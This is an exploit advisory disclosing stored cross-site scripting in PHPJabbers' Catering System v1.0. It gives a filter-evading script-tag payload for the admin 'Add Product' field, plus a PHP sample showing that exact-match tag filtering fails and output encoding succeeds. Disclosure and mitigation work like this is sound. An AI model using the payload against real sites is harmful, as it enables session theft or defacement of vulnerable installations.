Catering System v1.0 - XSS Vulnerabilities

2019.07.11
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

####################################################################
# Exploit Title: Catering System v1.0 - XSS Vulnerabilities
# Dork: N/A
# Date: 11.07.2019
# Exploit Author: Muhammed Yasir Aztepe
# Vendor Homepage: https://demo.phpjabbers.com/1562798478_148/index.php
# Software Link: https://www.phpjabbers.com/catering-system/
# Version: v1.0
# Category: Webapps
# Tested on: Windows
# CVE: N/A
####################################################################
# You can see the vulnerability by using the XSS code specified in the POC section.
# Proof of the vulnerability is in the links below.
# https://i.hizliresim.com/6DPYoW.png
# https://i.hizliresim.com/WXkWNL.png
# https://i.hizliresim.com/EO8QGn.png
####################################################################
# POC - XSS
# Parameters : Add Product
# Attack Pattern : <script ^__^>alert(String.fromCharCode(49))</script ^__^
# GET Request : https://demo.phpjabbers.com/1562798478_148/index.php?controller=pjAdminProducts&action=pjActionIndex
####################################################################
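
An added example (not from the advisory or the vendor's code) showing why a filter that matches `<script>` exactly does not stop the attack pattern above, while encoding at output does. The filter, the helper `e()` and the product-name field are assumptions made for illustration.

```php
<?php
// Constructed sample: the attack pattern quoted in the advisory, as it might be
// stored in a product-name field (the field name is an assumption).
$productName = '<script ^__^>alert(String.fromCharCode(49))</script ^__^';

// Hypothetical weak filter: strips only exact "<script>" / "</script>" tags.
// Not taken from the Catering System source; it illustrates the failure mode.
function naive_strip_script(string $value): string
{
    return str_ireplace(['<script>', '</script>'], '', $value);
}

// Output encoding for HTML element content and quoted attribute values.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

$filtered = naive_strip_script($productName);
$encoded  = e($productName);

// The extra tokens inside the tag mean the exact-match filter changes nothing.
var_dump($filtered === $productName);

// After encoding no "<" survives, so the value is rendered as text, not parsed as a tag.
var_dump(strpos($encoded, '<') === false);

// Encode at the point of output, in every template that prints the value.
echo '<td>' . e($productName) . '</td>', PHP_EOL;
echo '<input type="text" name="name" value="' . e($productName) . '">', PHP_EOL;
```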

References:

https://youtu.be/rRTzDJ2vBpE


Copyright 2019, cxsecurity.com